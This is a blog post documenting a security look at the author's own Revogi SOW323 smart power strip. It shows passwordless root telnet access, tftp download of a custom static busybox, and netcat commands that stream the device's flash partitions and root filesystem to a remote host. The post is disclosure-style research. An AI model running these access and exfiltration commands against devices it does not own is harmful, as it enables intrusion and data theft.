Friday, April 27, 2018

Revogi Smart Power Strip SOW323 IoT Security apocalypse

I started looking for a replacement for my trusty Gembird Silvershield USB-controlled 4-socket power plug, after some searching I discovered the Revogi Smart Power Strip SOW323. The device looks awesome, 6 controlled sockets, ethernet plug, power consumption monitoring, ~100EUR, just what I need! So I bought one and started looking around ...

The system security is state of the art, as one would expect from an IoT device.
# telnet 10.77.1.2
Trying 10.77.1.2...
Connected to 10.77.1.2.
Escape character is '^]'.
rlx-linux login: root
RLX Linux version 2.0
         _           _  _
        | |         | ||_|                
   _  _ | | _  _    | | _ ____  _   _  _  _
  | |/ || |\ \/ /   | || |  _ \| | | |\ \/ /
  | |_/ | |/    \   | || | | | | |_| |/    \
  |_|   |_|\_/\_/   |_||_|_| |_|\____|\_/\_/

For further information check:
http://processor.realtek.com/
#
Login is "root", the system doesn't even ask for password.

Sadly, the system is really cut down, most likely for security reasons, so it doesn't offer many useful commands:
#
arp        chmod      egrep      insmod     killall    modprobe   reboot     tar        vi
arping     cp         free       ip         ledbtn     mount      rm         telnetd
ash        cut        grep       iwconfig   ln         mv         rmmod      tftp
brctl      date       halt       iwcontrol  login      netstat    route      touch
busybox    depmod     hostname   iwlist     ls         ping       routed     udhcpc
cat        df         ifconfig   iwpriv     lsmod      poweroff   sh         udhcpd
cfg        echo       init       kill       mkdir      ps         switch     umount
But that's fine, there's the "tftp" command, so let's see:
# tftp -g -r /srv/tftp/test -l /tmp/test 10.0.0.1
# ls /tmp/test
/tmp/test
The syntax is a bit odd, but -g means "get", "-l" means local, "-r" means remote. The busybox version is 1.13.6 or so and oddly cut down. But this looks good, we can download files onto the Smart Power Strip.

Let's compile busybox with some more useful tools to dump the content of the flash, so we can politely ask vendor the for GPLed sources with a binary in hand.

The system runs RTL819x MIPS, uclibc 0.9.30 and Linux 2.6.30.9:

# cat /proc/cpuinfo
system type             : RTL819x
processor               : 0
cpu model               : 52481
BogoMIPS                : 379.28
hardware watchpoint     : no
tlb_entries             : 32
mips16 implemented      : yes
# ls /lib/ 
ld-uClibc-0.9.30.3.so   libcrypt.so.0           libm.so.0
ld-uClibc.so            libgcc.so               libpthread-0.9.30.3.so
ld-uClibc.so.0          libgcc_s.so             libpthread.so.0
ld.so.1                 libgcc_s.so.1           libuClibc-0.9.30.3.so
libc.so.0               libiw.so.29             modules
libcrypt-0.9.30.3.so    libm-0.9.30.3.so
libcrypt.so             libm.so
# ls /lib/modules/2.6.30.9/
build                modules.dep.bin      modules.pcimap
kernel               modules.ieee1394map  modules.seriomap
modules.alias        modules.inputmap     modules.symbols
modules.alias.bin    modules.isapnpmap    modules.symbols.bin
modules.ccwmap       modules.ofmap        modules.usbmap
modules.dep          modules.order        source
No modern MIPS toolchain would be able to produce binaries for that antique, but luckily there is RLX-linux SDK dump at github (link).

Then it's only a matter of doing a static build of busybox using the oldest SDK in the repo:
PATH=/path/to/rtl819x-toolchain/toolchain/rsdk-1.3.6-4181-EB-2.6.30-0.9.30/bin/:$PATH
export CROSS_COMPILE=mips-linux-
make menuconfig
make
And finally, transfer the static busybox binary to the system:
# tftp -g -r /srv/tftp/busybox -l /tmp/busybox 10.0.0.1
# chmod a+x /tmp/busybox 

# /tmp/busybox         
BusyBox v1.21.0 (2018-04-27 18:51:36 CEST) multi-call binary.

...
Good, replacement busybox with functionality like "netcat" is working. Finally, we can do something like this to pipe the content of flash over the network to a remote system:
cat /dev/mtdblock0 | /tmp/test/busybox nc 10.0.0.1 6666
cat /dev/mtdblock1 | /tmp/test/busybox nc 10.0.0.1 6666
Or back up the rootfs binaries for later analysis
# tar -cf /tmp/root.tar /bin /etc /home /init /lib /mnt /usr /var 
tar: removing leading '/' from member names
tar: /var/tmp/root.tar: file is the archive; skipping
# cat /tmp/root.tar | /tmp/busybox nc 10.0.0.1 6666

I can only finish this article with a famous quote, S in IoT stands for Security.

No comments: